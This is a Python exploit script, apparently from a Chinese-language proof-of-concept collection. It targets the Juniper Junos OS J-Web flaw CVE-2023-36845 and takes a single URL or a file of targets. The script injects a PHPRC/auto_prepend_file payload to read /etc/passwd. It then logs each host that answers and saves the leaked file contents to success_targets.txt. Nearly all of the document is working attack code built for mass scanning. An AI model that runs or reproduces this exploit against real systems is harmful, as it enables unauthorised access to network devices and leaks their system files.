juniper-cve-2023-36845.py

# 作者: VulnExpo
# 日期: 2023-9-22

import requests
import argparse
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def check_for_vulnerability(url, proxies={}, success_file=None):
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36",
    }
    payload = 'auto_prepend_file="/etc/passwd"'
    try:
        response = requests.post(url + "/?PHPRC=/dev/fd/0", headers=headers, data=payload, proxies=proxies, verify=False)
        if response.status_code == 200 and "root:" in response.text:
            with open(success_file, 'a') as s_file:
                s_file.write(f"++++++++++++++++++\n")
                s_file.write(f"目标URL: {url}\n")
                s_file.write(f"Payload: cat /etc/passwd\n")
                s_file.write(f"响应内容:\n{response.text}\n\n")
            return True
    except Exception as e:
        print(f"发生异常：{e}")
    return False

def scan_targets(targets, proxies={}, success_file=None):
    for target in targets:
        target = target.strip()
        check_for_vulnerability(target, proxies, success_file)

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Juniper Networks Junos OS 远程代码执行漏洞 CVE-2023-36844")
    parser.add_argument("-u", "--url", help="目标URL")
    parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
    args = parser.parse_args()

    if not args.url and not args.file:
        print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
        exit(1)

    if args.url:
        urls = [args.url]
    elif args.file:
        with open(args.file, 'r') as file:
            urls = file.readlines()

    proxies = {}
    success_file = 'success_targets.txt'

    for url in urls:
        url = url.strip()
        scan_targets([url], proxies, success_file)

    print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")